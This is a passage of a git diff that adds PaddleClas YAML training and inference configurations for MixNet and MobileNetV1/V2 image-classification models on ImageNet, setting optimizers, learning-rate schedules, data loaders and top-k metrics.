num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/MixNet/MixNet_L.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MixNet/MixNet_L.yaml new file mode 100644 index 0000000..b3c04aa --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MixNet/MixNet_L.yaml @@ -0,0 +1,132 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + 
output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + # training model under @to_static + to_static: False + +# model architecture +Arch: + name: MixNet_L + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + 
- CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/MixNet/MixNet_M.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MixNet/MixNet_M.yaml new file mode 100644 index 0000000..82248b6 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MixNet/MixNet_M.yaml @@ -0,0 +1,132 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + # training model under @to_static + to_static: False + +# model architecture +Arch: + name: MixNet_M + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + 
use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/MixNet/MixNet_S.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MixNet/MixNet_S.yaml new file mode 100644 index 0000000..20d68c7 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MixNet/MixNet_S.yaml @@ -0,0 +1,132 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + # training model under @to_static + to_static: False + +# model architecture +Arch: + name: MixNet_S + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 
0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV1/MobileNetV1.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV1/MobileNetV1.yaml new file mode 100644 index 0000000..53d1d1d --- 
/dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV1/MobileNetV1.yaml @@ -0,0 +1,132 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + # training model under @to_static + to_static: False + +# model architecture +Arch: + name: MobileNetV1 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.00003 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + 
use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV1/MobileNetV1_x0_25.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV1/MobileNetV1_x0_25.yaml new file mode 100644 index 0000000..9fc0dd9 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV1/MobileNetV1_x0_25.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: MobileNetV1_x0_25 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.00003 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: 
[0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV1/MobileNetV1_x0_5.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV1/MobileNetV1_x0_5.yaml new file mode 100644 index 0000000..ef70964 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV1/MobileNetV1_x0_5.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: MobileNetV1_x0_5 + 
class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.00003 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git 
a/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV1/MobileNetV1_x0_75.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV1/MobileNetV1_x0_75.yaml new file mode 100644 index 0000000..b9be283 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV1/MobileNetV1_x0_75.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: MobileNetV1_x0_75 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.00003 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 
0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV2/MobileNetV2.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV2/MobileNetV2.yaml new file mode 100644 index 0000000..fc0e61b --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV2/MobileNetV2.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 240 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + # training model under @to_static + to_static: False + +# model architecture +Arch: + name: MobileNetV2 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.045 + regularizer: + name: 'L2' + coeff: 0.00004 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + 
channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV2/MobileNetV2_x0_25.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV2/MobileNetV2_x0_25.yaml new file mode 100644 index 0000000..0ebe458 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV2/MobileNetV2_x0_25.yaml @@ -0,0 +1,128 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 240 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model 
export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: MobileNetV2_x0_25 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.045 + regularizer: + name: 'L2' + coeff: 0.00003 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + 
- TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV2/MobileNetV2_x0_5.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV2/MobileNetV2_x0_5.yaml new file mode 100644 index 0000000..c202390 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV2/MobileNetV2_x0_5.yaml @@ -0,0 +1,128 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 240 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: MobileNetV2_x0_5 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.045 + regularizer: + name: 'L2' + coeff: 0.00003 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] 
+ order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV2/MobileNetV2_x0_75.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV2/MobileNetV2_x0_75.yaml new file mode 100644 index 0000000..e581d72 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV2/MobileNetV2_x0_75.yaml @@ -0,0 +1,128 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 240 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: MobileNetV2_x0_75 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.045 + regularizer: + name: 'L2' + coeff: 0.00004 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - 
